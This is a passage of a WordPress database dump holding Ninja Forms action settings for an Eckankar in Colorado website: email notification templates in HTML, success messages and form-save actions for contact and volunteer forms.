p:admin_email}','to','{wp:admin_email}'),(2372,89,'reply_to','','reply_to',''),(2373,89,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2374,89,'email_message','{fields_table}','email_message','{fields_table}'),(2375,89,'email_message_plain','','email_message_plain',''),(2376,89,'from_name','','from_name',''),(2377,89,'from_address','','from_address',''),(2378,89,'email_format','html','email_format','html'),(2379,89,'cc','','cc',''),(2380,89,'bcc','','bcc',''),(2381,89,'redirect_url','','redirect_url',''),(2382,89,'parent_id','23','parent_id','23'),(2383,90,'title','','title',''),(2384,90,'key','','key',''),(2385,90,'type','email','type','email'),(2386,90,'active','1','active','1'),(2387,90,'created_at','2018-01-03 11:45:04','created_at','2018-01-03 11:45:04'),(2388,90,'date_updated','2016-01-15','date_updated','2016-01-15'),(2389,90,'attach_csv','0','attach_csv','0'),(2390,90,'email_format','html','email_format','html'),(2391,90,'reply_to','','reply_to',''),(2392,90,'cc','','cc',''),(2393,90,'bcc','','bcc',''),(2394,90,'redirect_url','','redirect_url',''),(2395,90,'success_msg','','success_msg',''),(2396,90,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(2397,90,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2398,90,'to','{field:email_192}','to','{field:email_192}'),(2399,90,'email_subject','Southwest Mountain Area Initiators and ESA\'s','email_subject','Southwest Mountain Area Initiators and ESA\'s'),(2400,90,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><h1>Eckankar In Colorado</h1></td><td>Â </td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_190},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting contact with a person on the \"Southwest Mountain Area ECK Leadership Communications\" team.</p><p>Here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_190}<br /> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_191}<br /> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_192}<br /> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_193}</span><br /> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_194}<br /> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166940171}</span></p><p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_198}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p>If you have any questions regarding the origin of this form, please feel free to contact the<br /> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><h1>Eckankar In Colorado</h1></td><td>Â </td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_190},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting contact with a person on the \"Southwest Mountain Area ECK Leadership Communications\" team.</p><p>Here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_190}<br /> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_191}<br /> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_192}<br /> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_193}</span><br /> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_194}<br /> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166940171}</span></p><p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_198}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p>If you have any questions regarding the origin of this form, please feel free to contact the<br /> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>'),(2401,90,'label','Send copy to user','label','Send copy to user'),(2402,90,'objectType','Action','objectType','Action'),(2403,90,'objectDomain','actions','objectDomain','actions'),(2404,90,'editActive','','editActive',''),(2405,90,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2406,90,'payment_gateways','','payment_gateways',''),(2407,90,'payment_total','0','payment_total','0'),(2408,90,'tag','','tag',''),(2409,90,'email_message_plain','','email_message_plain',''),(2410,90,'parent_id','23','parent_id','23'),(2411,91,'title','','title',''),(2412,91,'key','','key',''),(2413,91,'type','successmessage','type','successmessage'),(2414,91,'active','1','active','1'),(2415,91,'created_at','2018-01-03 11:45:04','created_at','2018-01-03 11:45:04'),(2416,91,'date_updated','2016-01-15','date_updated','2016-01-15'),(2417,91,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(2418,91,'from_name','','from_name',''),(2419,91,'from_address','','from_address',''),(2420,91,'to','{wp:admin_email}','to','{wp:admin_email}'),(2421,91,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2422,91,'email_message','{fields_table}','email_message','{fields_table}'),(2423,91,'attach_csv','0','attach_csv','0'),(2424,91,'email_format','html','email_format','html'),(2425,91,'reply_to','','reply_to',''),(2426,91,'cc','','cc',''),(2427,91,'bcc','','bcc',''),(2428,91,'redirect_url','','redirect_url',''),(2429,91,'label','Success Message','label','Success Message'),(2430,91,'objectType','Action','objectType','Action'),(2431,91,'objectDomain','actions','objectDomain','actions'),(2432,91,'editActive','','editActive',''),(2433,91,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2434,91,'payment_gateways','','payment_gateways',''),(2435,91,'payment_total','0','payment_total','0'),(2436,91,'tag','','tag',''),(2437,91,'email_message_plain','','email_message_plain',''),(2438,91,'parent_id','23','parent_id','23'),(2439,92,'title','','title',''),(2440,92,'key','','key',''),(2441,92,'type','email','type','email'),(2442,92,'active','1','active','1'),(2443,92,'created_at','2018-01-03 11:45:04','created_at','2018-01-03 11:45:04'),(2444,92,'date_updated','2016-01-19','date_updated','2016-01-19'),(2445,92,'from_name','Southwest Mountain Area Initiators and ESA\'s','from_name','Southwest Mountain Area Initiators and ESA\'s'),(2446,92,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2447,92,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(2448,92,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(2449,92,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Southwest Mountain Area Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Southwest Mountain Area ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_190}Â {field:lastname_191} </span>has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_190}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_191}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_192}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_193}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_194}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166940171}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_198}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Southwest Mountain Area Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Southwest Mountain Area ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_190}Â {field:lastname_191} </span>has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_190}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_191}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_192}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_193}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_194}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166940171}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_198}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(2450,92,'attach_csv','0','attach_csv','0'),(2451,92,'email_format','html','email_format','html'),(2452,92,'reply_to','','reply_to',''),(2453,92,'cc','','cc',''),(2454,92,'bcc','','bcc',''),(2455,92,'redirect_url','','redirect_url',''),(2456,92,'success_msg','','success_msg',''),(2457,92,'label','Admin Email','label','Admin Email'),(2458,92,'objectType','Action','objectType','Action'),(2459,92,'objectDomain','actions','objectDomain','actions'),(2460,92,'editActive','','editActive',''),(2461,92,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2462,92,'payment_gateways','','payment_gateways',''),(2463,92,'payment_total','0','payment_total','0'),(2464,92,'tag','','tag',''),(2465,92,'email_message_plain','','email_message_plain',''),(2466,92,'drawerDisabled','','drawerDisabled',''),(2467,92,'parent_id','23','parent_id','23'),(2468,93,'title','','title',''),(2469,93,'key','','key',''),(2470,93,'type','save','type','save'),(2471,93,'active','1','active','1'),(2472,93,'created_at','2018-01-03 11:45:20','created_at','2018-01-03 11:45:20'),(2473,93,'label','Save Form','label','Save Form'),(2474,93,'objectType','Action','objectType','Action'),(2475,93,'objectDomain','actions','objectDomain','actions'),(2476,93,'editActive','','editActive',''),(2477,93,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2478,93,'payment_gateways','','payment_gateways',''),(2479,93,'payment_total','0','payment_total','0'),(2480,93,'tag','','tag',''),(2481,93,'to','{wp:admin_email}','to','{wp:admin_email}'),(2482,93,'reply_to','','reply_to',''),(2483,93,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2484,93,'email_message','{fields_table}','email_message','{fields_table}'),(2485,93,'email_message_plain','','email_message_plain',''),(2486,93,'from_name','','from_name',''),(2487,93,'from_address','','from_address',''),(2488,93,'email_format','html','email_format','html'),(2489,93,'cc','','cc',''),(2490,93,'bcc','','bcc',''),(2491,93,'redirect_url','','redirect_url',''),(2492,93,'parent_id','24','parent_id','24'),(2493,94,'title','','title',''),(2494,94,'key','','key',''),(2495,94,'type','email','type','email'),(2496,94,'active','1','active','1'),(2497,94,'created_at','2018-01-03 11:45:20','created_at','2018-01-03 11:45:20'),(2498,94,'date_updated','2016-01-15','date_updated','2016-01-15'),(2499,94,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(2500,94,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2501,94,'to','{field:email_223}','to','{field:email_223}'),(2502,94,'email_subject','Eckankar in Colorado Volunteer Opportunities','email_subject','Eckankar in Colorado Volunteer Opportunities'),(2503,94,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_221},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website offering your services as an ECK volunteer.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_221}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_222}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_223}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_224}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_225}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #23507d\"><strong>Area(s) for which you have volunteered:</strong></span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>Book Discussions:</strong> {field:listmultiselect_228}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Community HU:</strong> {field:listmultiselect_232}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ECK Worship Service:</strong> {field:listmultiselect_233}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Email Newsletter Help:</strong> {field:listmultiselect_234}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Round Tables:</strong> {field:listmultiselect_235}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Satsangs:</strong> {field:listmultiselect_236}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Vahana:</strong> {field:listmultiselect_237}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE </strong><em>(Optional)</em><strong>: </strong>{field:textarea_229}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br 